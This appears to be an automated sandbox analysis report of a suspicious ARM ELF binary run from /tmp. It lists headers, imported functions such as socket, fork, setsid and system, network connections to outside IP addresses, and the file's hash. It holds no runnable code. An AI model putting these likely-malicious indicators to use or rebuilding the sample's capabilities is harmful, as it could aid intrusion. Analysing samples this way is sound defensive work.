                                                  File Content Preview:.ELF...a..........(.........4...X.......4. ...(.........4...4...4...................................................................0...0...............4...4...4.......................H...H...H...................Q.td............................/lib/ld-uCl

                                                  ELF header

                                                  Class:
                                                  Data:
                                                  Version:
                                                  Machine:
                                                  Version Number:
                                                  Type:
                                                  OS/ABI:
                                                  ABI Version:
                                                  Entry Point Address:
                                                  Flags:
                                                  ELF Header Size:
                                                  Program Header Offset:
                                                  Program Header Size:
                                                  Number of Program Headers:
                                                  Section Header Offset:
                                                  Section Header Size:
                                                  Number of Section Headers:
                                                  Header String Table Index:
                                                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                  NULL0x00x00x00x00x0000
                                                  .interpPROGBITS0x80f40xf40x140x00x2A001
                                                  .hashHASH0x81080x1080x2340x40x2A304
                                                  .dynsymDYNSYM0x833c0x33c0x4800x100x2A414
                                                  .dynstrSTRTAB0x87bc0x7bc0x2300x00x2A001
                                                  .rel.pltREL0x89ec0x9ec0x1a00x80x2A374
                                                  .initPROGBITS0x8b8c0xb8c0x180x00x6AX004
                                                  .pltPROGBITS0x8ba40xba40x2840x40x6AX004
                                                  .textPROGBITS0x8e280xe280x7ddc0x00x6AX004
                                                  .finiPROGBITS0x10c040x8c040x140x00x6AX004
                                                  .rodataPROGBITS0x10c180x8c180xe180x00x2A004
                                                  .ctorsPROGBITS0x19a340x9a340x80x00x3WA004
                                                  .dtorsPROGBITS0x19a3c0x9a3c0x80x00x3WA004
                                                  .dynamicDYNAMIC0x19a480x9a480x980x80x3WA404
                                                  .gotPROGBITS0x19ae00x9ae00xdc0x40x3WA004
                                                  .dataPROGBITS0x19bbc0x9bbc0x280x00x3WA004
                                                  .bssNOBITS0x19be40x9be40x1240x00x3WA004
                                                  .shstrtabSTRTAB0x00x9be40x730x00x0001
                                                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                  PHDR0x340x80340x80340xc00xc02.24010x5R E0x4
                                                  INTERP0xf40x80f40x80f40x140x143.68420x4R 0x1/lib/ld-uClibc.so.0.interp
                                                  LOAD0x00x80000x80000x9a300x9a306.12480x5R E0x8000.interp .hash .dynsym .dynstr .rel.plt .init .plt .text .fini .rodata
                                                  LOAD0x9a340x19a340x19a340x1b00x2d42.31680x6RW 0x8000.ctors .dtors .dynamic .got .data .bss
                                                  DYNAMIC0x9a480x19a480x19a480x980x981.89840x6RW 0x4.dynamic
                                                  GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                  TypeMetaValueTag
                                                  DT_NEEDEDsharedliblibc.so.00x1
                                                  DT_INITvalue0x8b8c0xc
                                                  DT_FINIvalue0x10c040xd
                                                  DT_HASHvalue0x81080x4
                                                  DT_STRTABvalue0x87bc0x5
                                                  DT_SYMTABvalue0x833c0x6
                                                  DT_STRSZbytes5600xa
                                                  DT_SYMENTbytes160xb
                                                  DT_DEBUGvalue0x00x15
                                                  DT_PLTGOTvalue0x19ae00x3
                                                  DT_PLTRELSZbytes4160x2
                                                  DT_PLTRELpltrelDT_REL0x14
                                                  DT_JMPRELvalue0x89ec0x17
                                                  DT_NULLvalue0x00x0
                                                  NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                                                  .dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                  __aeabi_idiv0.dynsym0x10b744FUNC<unknown>DEFAULT8
                                                  __aeabi_ldiv0.dynsym0x10b744FUNC<unknown>DEFAULT8
                                                  __aeabi_uidiv.dynsym0x108b40FUNC<unknown>DEFAULT8
                                                  __aeabi_uidivmod.dynsym0x109ac24FUNC<unknown>DEFAULT8
                                                  __bss_end__.dynsym0x19d080NOTYPE<unknown>DEFAULTSHN_ABS
                                                  __bss_start.dynsym0x19be40NOTYPE<unknown>DEFAULTSHN_ABS
                                                  __bss_start__.dynsym0x19be40NOTYPE<unknown>DEFAULTSHN_ABS
                                                  __data_start.dynsym0x19bbc0NOTYPE<unknown>DEFAULT17
                                                  __div0.dynsym0x10b744FUNC<unknown>DEFAULT8
                                                  __end__.dynsym0x19d080NOTYPE<unknown>DEFAULTSHN_ABS
                                                  __errno_location.dynsym0x8d9832FUNC<unknown>DEFAULTSHN_UNDEF
                                                  __modsi3.dynsym0x10a90228FUNC<unknown>DEFAULT8
                                                  __muldi3.dynsym0x10b7880FUNC<unknown>DEFAULT8
                                                  __uClibc_main.dynsym0x8d2c488FUNC<unknown>DEFAULTSHN_UNDEF
                                                  __udivsi3.dynsym0x108b4248FUNC<unknown>DEFAULT8
                                                  __umodsi3.dynsym0x109c4204FUNC<unknown>DEFAULT8
                                                  _bss_end__.dynsym0x19d080NOTYPE<unknown>DEFAULTSHN_ABS
                                                  _edata.dynsym0x19be40NOTYPE<unknown>DEFAULTSHN_ABS
                                                  _end.dynsym0x19d080NOTYPE<unknown>DEFAULTSHN_ABS
                                                  _exit.dynsym0x8db040FUNC<unknown>DEFAULTSHN_UNDEF
                                                  _start.dynsym0x8f0880FUNC<unknown>DEFAULT8
                                                  abort.dynsym0x8c6c352FUNC<unknown>DEFAULTSHN_UNDEF
                                                  accept.dynsym0x8c7844FUNC<unknown>DEFAULTSHN_UNDEF
                                                  bind.dynsym0x8ca844FUNC<unknown>DEFAULTSHN_UNDEF
                                                  calloc.dynsym0x8c8488FUNC<unknown>DEFAULTSHN_UNDEF
                                                  clock.dynsym0x8dd452FUNC<unknown>DEFAULTSHN_UNDEF
                                                  close.dynsym0x8e0444FUNC<unknown>DEFAULTSHN_UNDEF
                                                  closedir.dynsym0x8dec196FUNC<unknown>DEFAULTSHN_UNDEF
                                                  connect.dynsym0x8bc444FUNC<unknown>DEFAULTSHN_UNDEF
                                                  exit.dynsym0x8da4172FUNC<unknown>DEFAULTSHN_UNDEF
                                                  fcntl.dynsym0x8df8116FUNC<unknown>DEFAULTSHN_UNDEF
                                                  fork.dynsym0x8d2044FUNC<unknown>DEFAULTSHN_UNDEF
                                                  free.dynsym0x8e10288FUNC<unknown>DEFAULTSHN_UNDEF
                                                  getpid.dynsym0x8bdc44FUNC<unknown>DEFAULTSHN_UNDEF
                                                  getppid.dynsym0x8d5044FUNC<unknown>DEFAULTSHN_UNDEF
                                                  getsockname.dynsym0x8e1c44FUNC<unknown>DEFAULTSHN_UNDEF
                                                  getsockopt.dynsym0x8d8048FUNC<unknown>DEFAULTSHN_UNDEF
                                                  inet_addr.dynsym0x8cb436FUNC<unknown>DEFAULTSHN_UNDEF
                                                  kill.dynsym0x8c9c44FUNC<unknown>DEFAULTSHN_UNDEF
                                                  listen.dynsym0x8d1444FUNC<unknown>DEFAULTSHN_UNDEF
                                                  malloc.dynsym0x8c0c400FUNC<unknown>DEFAULTSHN_UNDEF
                                                  memcpy.dynsym0x8bf44FUNC<unknown>DEFAULTSHN_UNDEF
                                                  memmove.dynsym0x8bd04FUNC<unknown>DEFAULTSHN_UNDEF
                                                  memset.dynsym0x8d38156FUNC<unknown>DEFAULTSHN_UNDEF
                                                  open.dynsym0x8dc892FUNC<unknown>DEFAULTSHN_UNDEF
                                                  opendir.dynsym0x8d68264FUNC<unknown>DEFAULTSHN_UNDEF
                                                  prctl.dynsym0x8be848FUNC<unknown>DEFAULTSHN_UNDEF
                                                  rand.dynsym0x8cd84FUNC<unknown>DEFAULTSHN_UNDEF
                                                  read.dynsym0x8ce444FUNC<unknown>DEFAULTSHN_UNDEF
                                                  readdir.dynsym0x8c54224FUNC<unknown>DEFAULTSHN_UNDEF
                                                  readlink.dynsym0x044FUNC<unknown>DEFAULTSHN_UNDEF
                                                  realloc.dynsym0x8cfc312FUNC<unknown>DEFAULTSHN_UNDEF
                                                  recv.dynsym0x8bb844FUNC<unknown>DEFAULTSHN_UNDEF
                                                  recvfrom.dynsym0x8c3052FUNC<unknown>DEFAULTSHN_UNDEF
                                                  remove.dynsym0x8c1872FUNC<unknown>DEFAULTSHN_UNDEF
                                                  select.dynsym0x8c4848FUNC<unknown>DEFAULTSHN_UNDEF
                                                  send.dynsym0x8c6044FUNC<unknown>DEFAULTSHN_UNDEF
                                                  sendto.dynsym0x8cf052FUNC<unknown>DEFAULTSHN_UNDEF
                                                  setsid.dynsym0x8de044FUNC<unknown>DEFAULTSHN_UNDEF
                                                  setsockopt.dynsym0x8cc048FUNC<unknown>DEFAULTSHN_UNDEF
                                                  sleep.dynsym0x8c24420FUNC<unknown>DEFAULTSHN_UNDEF
                                                  socket.dynsym0x8c3c44FUNC<unknown>DEFAULTSHN_UNDEF
                                                  sprintf.dynsym0x8d7452FUNC<unknown>DEFAULTSHN_UNDEF
                                                  srand.dynsym0x8d44148FUNC<unknown>DEFAULTSHN_UNDEF
                                                  stat.dynsym0x8d8c80FUNC<unknown>DEFAULTSHN_UNDEF
                                                  strlen.dynsym0x8dbc96FUNC<unknown>DEFAULTSHN_UNDEF
                                                  strstr.dynsym0x8ccc248FUNC<unknown>DEFAULTSHN_UNDEF
                                                  strtok.dynsym0x8d0836FUNC<unknown>DEFAULTSHN_UNDEF
                                                  system.dynsym0x8c00336FUNC<unknown>DEFAULTSHN_UNDEF
                                                  time.dynsym0x8d5c44FUNC<unknown>DEFAULTSHN_UNDEF
                                                  write.dynsym0x8c9044FUNC<unknown>DEFAULTSHN_UNDEF
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Mar 20, 2023 16:48:18.187361956 CET42836443192.168.2.2391.189.91.43
                                                  Mar 20, 2023 16:48:18.443370104 CET4251680192.168.2.23109.202.202.202
                                                  Mar 20, 2023 16:48:33.802670956 CET43928443192.168.2.2391.189.91.42
                                                  Mar 20, 2023 16:48:44.042093992 CET42836443192.168.2.2391.189.91.43
                                                  Mar 20, 2023 16:48:48.137826920 CET4251680192.168.2.23109.202.202.202
                                                  Mar 20, 2023 16:49:11.867672920 CET5699951628103.161.181.97192.168.2.23
                                                  Mar 20, 2023 16:49:11.867882013 CET5162856999192.168.2.23103.161.181.97
                                                  Mar 20, 2023 16:49:14.760677099 CET43928443192.168.2.2391.189.91.42
                                                  Mar 20, 2023 16:49:35.239443064 CET42836443192.168.2.2391.189.91.43

                                                  System Behavior

                                                  Start time:16:48:17
                                                  Start date:20/03/2023
                                                  Path:/tmp/r41xp4rOln.elf
                                                  Arguments:/tmp/r41xp4rOln.elf
                                                  File size:4956856 bytes
                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1